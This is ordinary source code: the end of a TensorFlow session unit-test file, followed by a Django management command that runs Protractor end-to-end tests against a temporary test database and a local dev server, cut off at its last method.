y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x: [1, 1]})
assert (y == 2 * np.ones(2)).all()
# Test nested tuple keys
z = (((array_ops.zeros([2]),),), array_ops.zeros([2]),
(array_ops.zeros([2]),))
result = [z[0][0][0] * 2, z[1] * 2, z[2][0] * 2]
values = (((np.array([1, 1]),),), np.array([2, 2]), (np.array([3, 3]),))
result_value = s.run(result, feed_dict={z: values})
self.assertAllEqual(result_value[0], 2 * np.ones(2))
self.assertAllEqual(result_value[1], 2 * np.array([2, 2]))
self.assertAllEqual(result_value[2], 2 * np.array([3, 3]))
def testGraphDef(self):
with session.Session() as sess:
self.assertProtoEquals('versions { producer: %d min_consumer: %d }' %
(versions.GRAPH_DEF_VERSION,
versions.GRAPH_DEF_VERSION_MIN_CONSUMER),
sess.graph_def)
c = constant_op.constant(5.0, name='c')
self.assertEquals(len(sess.graph_def.node), 1)
d = constant_op.constant(6.0, name='d')
self.assertEquals(len(sess.graph_def.node), 2)
self.assertAllEqual(c.eval(), 5.0)
self.assertAllEqual(d.eval(), 6.0)
e = constant_op.constant(7.0, name='e')
self.assertEquals(len(sess.graph_def.node), 3)
self.assertAllEqual(e.eval(), 7.0)
def testUseAfterClose(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)):
sess.run(c)
def testUseAfterCloseConcurrent(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
def update_thread():
with self.assertRaisesWithPredicateMatch(
RuntimeError,
lambda e: 'Attempted to use a closed Session.' in str(e)):
while True:
sess.run(c)
t = threading.Thread(target=update_thread)
t.start()
time.sleep(0.1)
sess.close()
t.join()
def testUseEmptyGraph(self):
with session.Session() as sess:
with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
sess.run([])
with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
sess.run(())
with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
sess.run({})
@test_util.run_v1_only('b/120545219')
def testNotEntered(self):
# pylint: disable=protected-access
self.assertEqual(ops._default_session_stack.get_default(), None)
# pylint: enable=protected-access
with ops.device('/cpu:0'):
sess = session.Session()
c_1 = constant_op.constant(5.0)
with sess.graph.as_default():
c_2 = constant_op.constant(5.0)
self.assertEqual(c_1.graph, c_2.graph)
self.assertEqual(sess.run(c_2), 5.0)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: 'No default session is registered.' in str(e)):
c_2.eval()
@test_util.run_v1_only('b/120545219')
def testInteractive(self):
with ops.device('/cpu:0'):
sess = session.InteractiveSession()
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
self.assertAllEqual([[4.0, 4.0, 4.0]], c.eval())
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
self.assertAllEqual([[24.0]], e.eval())
sess.close()
@test_util.run_v1_only('b/120545219')
def testMultipleInteractiveSessionsWarning(self):
# Reinitialize the global state to ensure that the expected warnings will
# be emitted.
session.InteractiveSession._active_session_count = 0 # pylint: disable=protected-access
sess = session.InteractiveSession()
sess.run(constant_op.constant(4.0)) # Run so that the session is "opened".
sess.close()
# Opening and closing interactive sessions serially should not warn.
with warnings.catch_warnings(record=True) as w:
sess = session.InteractiveSession()
sess.close()
self.assertEqual(0, len(w))
with warnings.catch_warnings(record=True) as w:
sess = session.InteractiveSession()
self.assertEqual(0, len(w))
with warnings.catch_warnings(record=True) as w:
sess2 = session.InteractiveSession()
self.assertEqual(1, len(w))
self.assertTrue('An interactive session is already active. This can cause '
'out-of-memory errors in some cases. You must explicitly '
'call `InteractiveSession.close()` to release resources '
'held by the other session(s).' in str(w[0].message))
sess2.close()
sess.close()
@test_util.run_v1_only('b/120545219')
def testInteractivePlacePrunedGraph(self):
sess = session.InteractiveSession()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/device:GPU:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
# Only run the valid op, this should work.
b.eval()
with self.assertRaises(errors.InvalidArgumentError):
a.eval()
sess.close()
@test_util.run_v1_only('b/120545219')
def testDefaultSessionPlacePrunedGraph(self):
sess = session.Session()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/device:GPU:0'):
_ = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
with self.assertRaises(errors.InvalidArgumentError):
# Even though we don't run the bad op, we place the entire
# graph, which should fail with a non-interactive session.
sess.run(b)
sess.close()
def testSharedGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
self.assertAllEqual(sess1.run(c), sess2.run(c))
def testDuplicatedInputs(self):
with session.Session() as sess:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 3])
a_val, b_val, a2_val = sess.run([a, b, a])
self.assertAllEqual(a_val, [[1.0, 1.0]])
self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]])
self.assertAllEqual(a2_val, [[1.0, 1.0]])
def testFeedAndFetch(self):
with session.Session() as sess:
for dtype in [
dtypes.float16, dtypes.float32, dtypes.float64, dtypes.int32,
dtypes.uint8, dtypes.int16, dtypes.int8, dtypes.int64, dtypes.bool,
dtypes.complex64, dtypes.complex128
]:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
np_dtype = dtype.as_numpy_dtype
feed_t = array_ops.placeholder(dtype=dtype, shape=shape)
out_t = array_ops.identity(feed_t)
np_array = np.random.randint(-10, 10, shape)
if dtype == dtypes.bool:
np_array = np_array > 0
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
          elif dtype == dtypes.complex128:
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
self.assertAllEqual(np_array,
sess.run(out_t, feed_dict={
feed_t: np_array
}))
# Check that we can also get the feed back.
self.assertAllEqual(np_array,
sess.run(feed_t, feed_dict={
feed_t: np_array
}))
# Also check that we can get both back.
out_v, feed_v = sess.run(
[out_t, feed_t], feed_dict={
feed_t: np_array
})
self.assertAllEqual(np_array, out_v)
self.assertAllEqual(np_array, feed_v)
feed_fetch_runner = sess.make_callable([out_t, feed_t], [feed_t])
out_v, feed_v = feed_fetch_runner(np_array)
self.assertAllEqual(np_array, out_v)
self.assertAllEqual(np_array, feed_v)
def testMakeCallableOnTensorWithRunOptions(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
tensor_runner = sess.make_callable(a, accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
res = tensor_runner(options=run_options, run_metadata=run_metadata)
self.assertEqual(42.0, res)
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testMakeCallableOnOperationWithRunOptions(self):
with session.Session() as sess:
a = variables.Variable(42.0)
b = state_ops.assign_add(a, 1.0)
sess.run(a.initializer)
tensor_runner = sess.make_callable(b.op, accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
tensor_runner(options=run_options, run_metadata=run_metadata)
self.assertEqual(43.0, sess.run(a))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testMakeCallableWithFeedListAndRunOptions(self):
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32)
a = math_ops.add(ph, 1.0)
tensor_runner = sess.make_callable(
a, feed_list=[ph.name], accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
self.assertAllClose(42.0,
tensor_runner(
41.0,
options=run_options,
run_metadata=run_metadata))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testOptimizedMakeCallable(self):
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32)
a = math_ops.add(ph, 1.0)
callable_opts = config_pb2.CallableOptions()
callable_opts.feed.append(ph.name)
callable_opts.fetch.append(a.name)
for _ in range(3):
callable_fn = sess._make_callable_from_options(callable_opts)
for _ in range(5):
self.assertEqual([2.0], callable_fn(np.array(1.0, dtype=np.float32)))
def testOptimizedMakeCallableWithRunMetadata(self):
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32)
a = math_ops.add(ph, 1.0)
callable_opts = config_pb2.CallableOptions()
callable_opts.feed.append(ph.name)
callable_opts.fetch.append(a.name)
callable_opts.run_options.trace_level = config_pb2.RunOptions.FULL_TRACE
callable_fn = sess._make_callable_from_options(callable_opts)
run_metadata = config_pb2.RunMetadata()
self.assertEqual([2.0], callable_fn(np.array(1.0, dtype=np.float32),
run_metadata=run_metadata))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testFeedError(self):
with session.Session() as sess:
feed_t = array_ops.placeholder(dtype=dtypes.float32)
out_t = array_ops.identity(feed_t)
feed_val = constant_op.constant(5.0)
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
sess.run(out_t, feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.eval(feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.op.run(feed_dict={feed_t: feed_val})
def testFeedPrecisionLossError(self):
with session.Session() as sess:
largest_int64 = np.iinfo(np.int64).max
feed_int_implicit_int32 = constant_op.constant(1)
feed_int_explicit_int32 = constant_op.constant(1, dtype=dtypes.int32)
out_t = constant_op.constant(1.0)
with self.assertRaisesRegexp(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_implicit_int32: largest_int64})
with self.assertRaisesRegexp(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_explicit_int32: largest_int64})
def testStringFetch(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array(
[compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape) if size > 0 else []
c = constant_op.constant(c_list)
self.assertAllEqual(c.eval(), c_list)
def testStringFeed(self):
with session.Session() as sess:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array(
[compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape)
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=shape)
c = array_ops.identity(feed_t)
self.assertAllEqual(sess.run(c, feed_dict={feed_t: c_list}), c_list)
self.assertAllEqual(
sess.run(feed_t, feed_dict={
feed_t: c_list
}), c_list)
c_v, feed_v = sess.run([c, feed_t], feed_dict={feed_t: c_list})
self.assertAllEqual(c_v, c_list)
self.assertAllEqual(feed_v, c_list)
def testStringFeedWithNullCharacters(self):
with session.Session():
c_list = [b'\n\x01\x00', b'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0])
self.assertEqual(c_list[1], out[1])
def testStringFeedWithUnicode(self):
with session.Session():
c_list = [
u'\n\x01\x00', u'\n\x00\x01', u'\u26a3 unicode',
u'\U0001f60e deal with it'
]
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[len(c_list)])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
for i in range(len(c_list)):
self.assertEqual(c_list[i], out[i].decode('utf-8'))
out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)})
for i in range(len(c_list)):
self.assertEqual(c_list[i], out[i].decode('utf-8'))
def testInvalidTargetFails(self):
with self.assertRaisesRegexp(
errors.NotFoundError,
'No session factory registered for the given session options'):
session.Session('INVALID_TARGET')
def testFetchByNameDifferentStringTypes(self):
with session.Session() as sess:
c = constant_op.constant(42.0, name='c')
d = constant_op.constant(43.0, name=u'd')
e = constant_op.constant(44.0, name=b'e')
f = constant_op.constant(45.0, name=r'f')
self.assertTrue(isinstance(c.name, six.text_type))
self.assertTrue(isinstance(d.name, six.text_type))
self.assertTrue(isinstance(e.name, six.text_type))
self.assertTrue(isinstance(f.name, six.text_type))
self.assertEqual(42.0, sess.run('c:0'))
self.assertEqual(42.0, sess.run(u'c:0'))
self.assertEqual(42.0, sess.run(b'c:0'))
self.assertEqual(42.0, sess.run(r'c:0'))
self.assertEqual(43.0, sess.run('d:0'))
self.assertEqual(43.0, sess.run(u'd:0'))
self.assertEqual(43.0, sess.run(b'd:0'))
self.assertEqual(43.0, sess.run(r'd:0'))
self.assertEqual(44.0, sess.run('e:0'))
self.assertEqual(44.0, sess.run(u'e:0'))
self.assertEqual(44.0, sess.run(b'e:0'))
self.assertEqual(44.0, sess.run(r'e:0'))
self.assertEqual(45.0, sess.run('f:0'))
self.assertEqual(45.0, sess.run(u'f:0'))
self.assertEqual(45.0, sess.run(b'f:0'))
self.assertEqual(45.0, sess.run(r'f:0'))
def testIncorrectGraph(self):
with ops.Graph().as_default() as g_1:
c_1 = constant_op.constant(1.0, name='c')
with ops.Graph().as_default() as g_2:
c_2 = constant_op.constant(2.0, name='c')
self.assertEqual('c', c_1.op.name)
self.assertEqual('c', c_2.op.name)
with session.Session(graph=g_1) as sess_1:
self.assertEqual(1.0, sess_1.run(c_1))
with self.assertRaises(ValueError):
sess_1.run(c_2)
with self.assertRaises(ValueError):
sess_1.run(c_2.op)
with session.Session(graph=g_2) as sess_2:
with self.assertRaises(ValueError):
sess_2.run(c_1)
with self.assertRaises(ValueError):
sess_2.run(c_1.op)
self.assertEqual(2.0, sess_2.run(c_2))
def testFeedDictKeyException(self):
with session.Session() as sess:
a = constant_op.constant(1.0, dtypes.float32, name='a')
with self.assertRaisesRegexp(TypeError, 'Cannot interpret feed_dict'):
sess.run(a, feed_dict={'a': [2.0]})
def testPerStepTrace(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
sess.run(constant_op.constant(1.0))
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(
constant_op.constant(1.0),
options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
self.assertEquals(len(run_metadata.step_stats.dev_stats), 1)
def testRunOptionsRunMetadata(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
# all combinations are valid
sess.run(constant_op.constant(1.0), options=None, run_metadata=None)
sess.run(
constant_op.constant(1.0), options=None, run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(
constant_op.constant(1.0), options=run_options, run_metadata=None)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(
constant_op.constant(1.0),
options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
self.assertEquals(len(run_metadata.step_stats.dev_stats), 1)
def testFeedShapeCompatibility(self):
with session.Session() as sess:
some_tensor = constant_op.constant([2.0, 2.0, 2.0, 2.0])
new_shape = constant_op.constant([2, 2])
reshaped_tensor = array_ops.reshape(some_tensor, new_shape)
with self.assertRaisesRegexp(ValueError, 'Cannot feed value of shape'):
sess.run(reshaped_tensor, feed_dict={some_tensor: [1.0, 2.0, 3.0]})
with self.assertRaisesRegexp(
errors.InvalidArgumentError,
'Input to reshape is a tensor with 4 values, '
'but the requested shape has 21'):
sess.run(reshaped_tensor, feed_dict={new_shape: [3, 7]})
def testInferShapesFalse(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session()
self.assertFalse('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testInferShapesTrue(self):
config_pb = config_pb2.ConfigProto(
graph_options=config_pb2.GraphOptions(infer_shapes=True))
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session(config=config_pb)
self.assertTrue('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testBuildCostModel(self):
run_options = config_pb2.RunOptions()
config_pb = config_pb2.ConfigProto(
allow_soft_placement=True,
graph_options=config_pb2.GraphOptions(build_cost_model=100))
with session.Session(config=config_pb) as sess:
with ops.device('/device:GPU:0'):
a = array_ops.placeholder(dtypes.float32, shape=[])
b = math_ops.add(a, a)
c = array_ops.identity(b)
d = math_ops.multiply(c, c)
for step in xrange(120):
run_metadata = config_pb2.RunMetadata()
sess.run(
d,
feed_dict={a: 1.0},
options=run_options,
run_metadata=run_metadata)
if step == 99:
self.assertTrue(run_metadata.HasField('cost_graph'))
else:
self.assertFalse(run_metadata.HasField('cost_graph'))
def runTestOutputPartitionGraphs(self, sess):
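    # partition_graphs is only populated in RunMetadata when
    # output_partition_graphs is set in the RunOptions passed to run().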
run_options = config_pb2.RunOptions(output_partition_graphs=True)
a = constant_op.constant(1)
run_metadata = config_pb2.RunMetadata()
sess.run(a, options=run_options, run_metadata=run_metadata)
self.assertGreater(len(run_metadata.partition_graphs), 0)
sess.run(a, run_metadata=run_metadata)
self.assertEqual(len(run_metadata.partition_graphs), 0)
@test_util.run_v1_only('b/120545219')
def testOutputPartitionGraphsDirect(self):
self.runTestOutputPartitionGraphs(session.Session())
@test_util.run_v1_only('b/120545219')
def testOutputPartitionGraphsDistributed(self):
server = server_lib.Server.create_local_server()
self.runTestOutputPartitionGraphs(session.Session(server.target))
def testNonInteractiveSessionNesting(self):
sess1 = session.Session()
sess1_controller = sess1.as_default()
sess1_controller.__enter__()
sess2 = session.Session()
sess2_controller = sess2.as_default()
sess2_controller.__enter__()
with self.assertRaisesRegexp(AssertionError, 'Nesting violated'):
sess1_controller.__exit__(None, None, None)
ops._default_session_stack.reset()
def testInteractiveSessionNesting(self):
sess1 = session.InteractiveSession()
sess2 = session.InteractiveSession()
del sess1
del sess2
@test_util.run_v1_only('b/120545219')
def testAsDefault(self):
c = constant_op.constant(37)
sess = session.Session()
with sess.as_default():
self.assertEqual(37, c.eval())
# Ensure that the session remains valid even when it is not captured.
with session.Session().as_default():
self.assertEqual(37, c.eval())
def testReentry(self):
sess = session.Session()
with self.assertRaisesRegexp(RuntimeError, 'not re-entrant'):
with sess:
with sess:
pass
def testInvalidArgument(self):
with self.assertRaisesRegexp(TypeError, 'target must be a string'):
session.Session(37)
with self.assertRaisesRegexp(TypeError, 'config must be a tf.ConfigProto'):
session.Session(config=37)
with self.assertRaisesRegexp(TypeError, 'graph must be a tf.Graph'):
session.Session(graph=37)
@test_util.run_v1_only('b/120545219')
def testTimeoutWithShortOperations(self):
num_epochs = 5
q = data_flow_ops.FIFOQueue(capacity=50, dtypes=[dtypes.int32], shapes=[()])
enqueue_op = q.enqueue_many(constant_op.constant([1, 2]))
# Use a 10-second timeout, which should be longer than any
# non-blocking enqueue_many op.
config_pb = config_pb2.ConfigProto(operation_timeout_in_ms=10000)
with session.Session(config=config_pb) as sess:
for _ in range(num_epochs):
sess.run(enqueue_op)
self.assertEqual(sess.run(q.size()), num_epochs * 2)
@test_util.run_v1_only('b/120545219')
def testRegisterFetchAndFeedConversionFunctions(self):
class SquaredTensor(object):
def __init__(self, tensor):
self.sq = math_ops.square(tensor)
fetch_fn = lambda squared_tensor: ([squared_tensor.sq], lambda val: val[0])
feed_fn1 = lambda feed, feed_val: [(feed.sq, feed_val)]
feed_fn2 = lambda feed: [feed.sq]
session.register_session_run_conversion_functions(SquaredTensor, fetch_fn,
feed_fn1, feed_fn2)
with self.assertRaises(ValueError):
session.register_session_run_conversion_functions(SquaredTensor, fetch_fn,
feed_fn1, feed_fn2)
with self.cached_session() as sess:
np1 = np.array([1.0, 1.5, 2.0, 2.5])
np2 = np.array([3.0, 3.5, 4.0, 4.5])
squared_tensor = SquaredTensor(np2)
squared_eval = sess.run(squared_tensor)
self.assertAllClose(np2 * np2, squared_eval)
squared_eval = sess.run(
squared_tensor, feed_dict={
squared_tensor: np1 * np1
})
self.assertAllClose(np1 * np1, squared_eval)
partial_run = sess.partial_run_setup([squared_tensor], [])
squared_eval = sess.partial_run(partial_run, squared_tensor)
self.assertAllClose(np2 * np2, squared_eval)
def testDefaultLogDevicePlacement(self):
class CaptureStderr(str):
"""Class to capture stderr from C++ shared library."""
def __enter__(self):
self._esc = compat.as_str('\b')
self._output = compat.as_str('')
self._stderr = sys.stderr
self._fd = self._stderr.fileno()
self._out_pipe, in_pipe = os.pipe()
# Save the original io stream.
self._dup_fd = os.dup(self._fd)
# Replace the original io stream with in pipe.
os.dup2(in_pipe, self._fd)
return self
def __exit__(self, *args):
self._stderr.write(self._esc)
self._stderr.flush()
self.read()
os.close(self._out_pipe)
# Restore the original io stream.
os.dup2(self._dup_fd, self._fd)
def read(self):
while True:
data = os.read(self._out_pipe, 1)
if not data or compat.as_str(data) == self._esc:
break
self._output += compat.as_str(data)
def __str__(self):
return self._output
if context.executing_eagerly():
context.set_log_device_placement(True)
with CaptureStderr() as log:
a = constant_op.constant(1)
b = constant_op.constant(2)
c = a + b
else:
# Passing the config to the server, but not the session should still
# result in logging device placement.
config_pb = config_pb2.ConfigProto(log_device_placement=True)
server = server_lib.Server.create_local_server(config=config_pb)
a = constant_op.constant(1)
b = constant_op.constant(2)
c = a + b
with session.Session(server.target) as sess:
with CaptureStderr() as log:
sess.run(c)
# Ensure that we did log device placement.
self.assertTrue('/replica:0/task:0/device:CPU:0' in str(log), str(log))
@test_util.run_v1_only('b/120545219')
def testLocalMasterSessionTimeout(self):
# Test that the timeout passed in a config to the session works correctly.
config_pb = config_pb2.ConfigProto(operation_timeout_in_ms=1000)
server = server_lib.Server.create_local_server()
q = data_flow_ops.FIFOQueue(1, dtypes.float32)
dequeued_t = q.dequeue()
with session.Session(server.target, config=config_pb) as sess:
# Intentionally do not run any enqueue_ops so that dequeue will block
# until operation_timeout_in_ms.
with self.assertRaises(errors.DeadlineExceededError):
sess.run(dequeued_t)
@test_util.run_v1_only('b/120545219')
def testDefaultServerTimeout(self):
# Test that the default server config timeout gets used when no Session
# config is provided.
config_pb = config_pb2.ConfigProto(operation_timeout_in_ms=1000)
server = server_lib.Server.create_local_server(config=config_pb)
q = data_flow_ops.FIFOQueue(1, dtypes.float32)
dequeued_t = q.dequeue()
with session.Session(server.target) as sess:
# Intentionally do not run any enqueue_ops so that dequeue will block
# until operation_timeout_in_ms.
with self.assertRaises(errors.DeadlineExceededError):
sess.run(dequeued_t)
def runTestBuildGraphError(self, sess):
# Ensure that errors from building the graph get propagated.
data = array_ops.placeholder(dtypes.float32, shape=[])
# pylint: disable=protected-access
enter_1 = gen_control_flow_ops.enter(data, 'foo_1', False)
enter_2 = gen_control_flow_ops.enter(data, 'foo_2', False)
# pylint: enable=protected-access
res = math_ops.add(enter_1, enter_2)
with self.assertRaisesOpError('has inputs from different frames'):
sess.run(res, feed_dict={data: 1.0})
@test_util.run_v1_only('b/120545219')
def testBuildGraphErrorDirect(self):
self.runTestBuildGraphError(session.Session())
@test_util.run_v1_only('b/120545219')
def testBuildGraphErrorDist(self):
server = server_lib.Server.create_local_server()
self.runTestBuildGraphError(session.Session(server.target))
def testDeviceAttributes(self):
attrs = session._DeviceAttributes(
'/job:worker/replica:0/task:3/device:CPU:2', 'TYPE', 1337, 1000000)
self.assertEqual(1337, attrs.memory_limit_bytes)
self.assertEqual('/job:worker/replica:0/task:3/device:CPU:2', attrs.name)
self.assertEqual('TYPE', attrs.device_type)
self.assertEqual(1000000, attrs.incarnation)
str_repr = '%s' % attrs
self.assertTrue(str_repr.startswith('_DeviceAttributes'), str_repr)
def testDeviceAttributesCanonicalization(self):
attrs = session._DeviceAttributes('/job:worker/replica:0/task:3/cpu:1',
'TYPE', 1337, 1000000)
self.assertEqual(1337, attrs.memory_limit_bytes)
self.assertEqual('/job:worker/replica:0/task:3/device:CPU:1', attrs.name)
self.assertEqual('TYPE', attrs.device_type)
self.assertEqual(1000000, attrs.incarnation)
str_repr = '%s' % attrs
self.assertTrue(str_repr.startswith('_DeviceAttributes'), str_repr)
def runTestAddFunctionToSession(self, target=''):
"""Add a function to a session after the graph has already been run."""
@function.Defun(dtypes.float32)
def foo(x):
return x + 1
x = constant_op.constant(1.0)
with session.Session(target=target) as sess:
sess.run(x)
f = foo(x)
result = sess.run(f)
self.assertEqual(result, 2.0)
@test_util.run_v1_only('b/120545219')
def testAddFunctionToSession(self):
self.runTestAddFunctionToSession()
@test_util.run_v1_only('b/120545219')
def testAddFunctionToGrpcSession(self):
server = server_lib.Server.create_local_server()
self.runTestAddFunctionToSession(server.target)
def testOpenAndCloseGrpcSession(self):
server = server_lib.Server.create_local_server()
with session.Session(server.target):
pass
def testOpenAndCloseSession(self):
with session.Session():
pass
@test_util.run_v1_only('b/120545219')
def testAutoConvertAndCheckData(self):
with self.cached_session() as sess:
a = array_ops.placeholder(dtype=dtypes.string)
with self.assertRaisesRegexp(
TypeError, r'Type of feed value 1 with type <(\w+) \'int\'> is not'):
sess.run(a, feed_dict={a: 1})
@test_util.run_v1_only('b/120545219')
def testOptimizerOptions(self):
config.set_optimizer_experimental_options({'min_graph_nodes': -1})
with ops.Graph().as_default():
sess = session.Session()
self.assertEqual(
sess._config.graph_options.rewrite_options.min_graph_nodes, -1)
if __name__ == '__main__':
googletest.main()
|
protractor.py
|
# -*- coding: utf-8 -*-
import os
import sys
from multiprocessing import Process
from optparse import make_option
import subprocess
from django.core.management import call_command
from django.core.management.base import BaseCommand
from django.db import connection
from django.test.runner import setup_databases
class Command(BaseCommand):
args = '[--protractor-conf] [--runserver-command] [--specs] [--suite] [--addrport]'
help = 'Run protractor tests with a test database'
option_list = BaseCommand.option_list + (
make_option('--protractor-conf',
action='store',
dest='protractor_conf',
default='protractor.conf.js',
help='Specify a destination for your protractor configuration'
),
make_option('--runserver-command',
action='store',
dest='run_server_command',
default='runserver',
help='Specify which command you want to run a server'
),
make_option('--specs',
action='store',
dest='specs',
help='Specify which specs to run'
),
make_option('--suite',
action='store',
dest='suite',
help='Specify which suite to run'
),
make_option('--fixture',
action='append',
dest='fixtures',
help='Specify fixture to load initial data to the database'
),
make_option('--addrport', action='store', dest='addrport',
type='string',
help='port number or ipaddr:port to run the server on'),
)
def handle(self, *args, **options):
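    # Flow: start the Selenium webdriver, create the test database(s), load
    # any fixtures, launch the dev server in a daemonised child process, run
    # the protractor CLI against it, then stop the server and tear the test
    # database(s) down again.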
options['verbosity'] = int(options.get('verbosity'))
if not os.path.exists(options['protractor_conf']):
raise IOError("Could not find '{}'"
.format(options['protractor_conf']))
self.run_webdriver()
old_config = self.setup_databases(options)
fixtures = options['fixtures']
if fixtures:
call_command('loaddata', *fixtures,
**{'verbosity': options['verbosity']})
if options['addrport'] is None:
options['addrport'] = os.environ.get(
'DJANGO_LIVE_TEST_SERVER_ADDRESS', '8081')
test_server_process = Process(target=self.runserver, args=(options,))
test_server_process.daemon = True
test_server_process.start()
authority = options['addrport']
if ':' not in authority:
authority = 'localhost:' + authority
live_server_url = 'http://%s' % authority
params = {
'live_server_url': live_server_url
}
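    # Every entry in params is forwarded to protractor as
    # --params.<key>=<value>, so specs can read e.g. the live server URL
    # (typically via browser.params).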
protractor_command = 'protractor {}'.format(options['protractor_conf'])
protractor_command += ' --baseUrl {}'.format(live_server_url)
if options['specs']:
protractor_command += ' --specs {}'.format(options['specs'])
if options['suite']:
protractor_command += ' --suite {}'.format(options['suite'])
for key, value in params.items():
protractor_command += ' --params.{key}={value}'.format(
key=key, value=value
)
return_code = subprocess.call(protractor_command.split())
# Terminate the live server process before tearing down the databases
# to prevent the error
# django.db.utils.OperationalError: database is being accessed by other users
test_server_process.terminate()
self.teardown_databases(old_config, options)
if return_code:
self.stdout.write('Failed')
sys.exit(1)
else:
self.stdout.write('Success')
def setup_databases(self, options):
return setup_databases(options['verbosity'], False)
def teardown_databases(self, old_config, options):
"""
Destroys all the non-mirror databases.
"""
if len(old_config) > 1:
old_names, mirrors = old_config
else:
old_names = old_config
for connection, old_name, destroy in old_names:
if destroy:
connection.creation.destroy_test_db(old_name, options['verbosity'])
def runserver(self, options):
use_threading = connection.features.test_db_allows_multiple_connections
self.stdout.write('Starting server...')
call_command(
options['run_server_command'],
addrport=options.get('addrport'),
shutdown_message='',
use_reloader=False,
use_ipv6=False,
verbosity=0,
use_threading=use_threading,
stdout=open(os.devnull, 'w')
)
def run_webdriver(self):
